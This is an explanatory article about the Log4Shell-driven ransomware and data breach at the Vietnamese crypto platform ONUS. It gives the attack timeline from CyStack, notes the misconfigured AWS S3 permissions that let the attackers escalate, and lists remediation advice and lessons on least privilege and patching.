LOG4J Attack on Cryptocurrency Firm ONUS

ONUS, one of Vietnam’s largest cryptocurrency platforms has, according to multiple reports, been the victim of a ransomware attack that was traced to the current Apache remote code execution vulnerability, LOG4J, via a third-party payment software.

Cystack, a security firm partnering with ONUS, and who was involved in the investigation, said that the incident started with a LOG4Shell vulnerability in their payment software provided by Cyclos.

The discovery was first reported on Dec. 9, 2021, and sent security teams in a frenzy, trying to identify vulnerable devices, and install patches as that have since been coming out on a semi-regular basis.

How does it work?

So for the uninitiated, LOG4J is an open-source software provided by the Apache Software foundation, which records events — errors and routine system operations — and communicates diagnostic messages about them to system administrators and users.

Consider this scenario. Your friend sends you a link to a website that has discounts on the latest , only the link is dead link so when you try to visit the page, you get an ‘error 404’, indicating that the page could not be found. This is the result of your query reaching a web server, and that web server sending a message back that you’re trying to reach a webpage that doesn’t exist. While this process is going on, there is also a log being generated using LOG4J, that the server’s system administrators can then access at a later date.

What Happened with ONUS?

In the case of ONUS, as was stated earlier, the LOG4J vulnerability was discovered in the Cyclos software that they use to handle their payments. However, the attackers were able to ‘escalate’ the attack due to misconfigured permissions at AWS S3 (Amazon Web Service — Simple Storage Service), a cloud storage offering. They systems administrators at ONUS had granted the AWS S3 ‘Full access’ permissions to the access key, which allowed the attackers to compromise, and easily delete all of the S3 buckets.

According to Cystack, the servers were also running a script to periodically back up the database to AWS S3, which contained the database hostname, username/password and also backup SQL files. This meant that the attackers were able to access the ONUS database to get user information. The attackers took full advantage and exfiltrated the data of some 2 million ONUS users — including name, email and phone numbers, address, E-KYC (Know Your Customer) data, hashed passwords, transaction history and other unspecified ‘encrypted information.’

The threat actors took advantage of a vulnerability in a set of libraries in the ONUS system to get into the sandbox server (the server used for programming purposes only). However, due to the permission configuration error, this server contains information that gave them access to the data storage system.

Attack Timeline according to Cystack

09/12/2021 — the Log4Shell vulnerability was published. At that time, ONUS was carefully monitoring their system security but they did not know that Cyclos was among the software affected by the Log4Shell vulnerability.

11–13/12/2021 — the attackers exploited the Log4Shell vulnerability on a Cyclos server of ONUS and left backdoor behind.

14/12/2021 — Cyclos notified ONUS of the vulnerability and issued instructions to patch the vulnerability. ONUS immediately patched the vulnerability according to those instructions.

23/12/2021 — while monitoring the system, CyStack detected some abnormal activities and informed ONUS. When ONUS confirmed that the user data in the AWS S3 had been deleted, Cystack immediately enact incident response protocols The keys were deactivated shortly after.

24/12/2021 — the attackers sent a ransom request of $5M USD to ONUS via Telegram. ONUS rejected the request and disclosed this attack to their users. CyStack confirmed that the Log4Shell vulnerability of Cyclos was the root cause and started checking all Cyclos nodes to find and remove backdoor.

25/12/2021 — the attackers posted about the leak to a hacking forum and claim to have copies of the ONUS database.

Remediation?

In order to improve their security and mitigate the effects of the exploited vulnerability, CyStack recommended the following actions to ONUS:

1. Patching the LOG4Shell vulnerability in Cyclos per the instructions from the vendor.
2. Deactivating all the leaked credentials.
3. Granting permissions properly to AWS keys that can access AWS S3 buckets and other services.
4. Blocking public access to all sensitive S3 buckets and requiring tokens to access the certain objects.

The LOG4J vulnerability (also known as LOG4Shell) was reported on December 9, 2021.

Lessons Learned?

One of the most egregious mistakes that ONUS made was to grant Amazon S3 full access permissions to the access key which was then utilized by the attackers to compromise and easily delete the buckets.
From a cybersecurity perspective, you always want to approach permissions with the ‘principle of least privilege’ in mind — this means granting only the minimum access/permissions that individuals need to do their job.

When granting permissions, it is not enough to be able to verify who has access, but it is equally important to manage what they have access to, and take steps to segment sensitive data from other publicly accessible data.

Finally, this kind of doesn’t really apply in this situation due to how soon the attackers exploited the vulnerability after it was made public, but security teams should always try to keep up with patches from Vendors as soon as they are rolled out. This way, they can decrease their attack surface and make their organization less attractive to would-be attackers.